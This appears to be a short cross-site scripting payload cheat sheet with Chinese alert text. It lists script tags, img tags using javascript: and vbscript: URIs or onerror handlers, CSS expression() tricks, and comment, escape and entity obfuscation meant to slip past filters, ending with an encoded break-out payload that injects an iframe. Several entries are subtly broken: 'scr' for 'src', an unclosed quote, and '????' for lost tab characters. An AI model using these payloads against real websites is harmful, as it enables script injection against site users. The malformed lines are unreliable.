<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (whitespace inserted with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["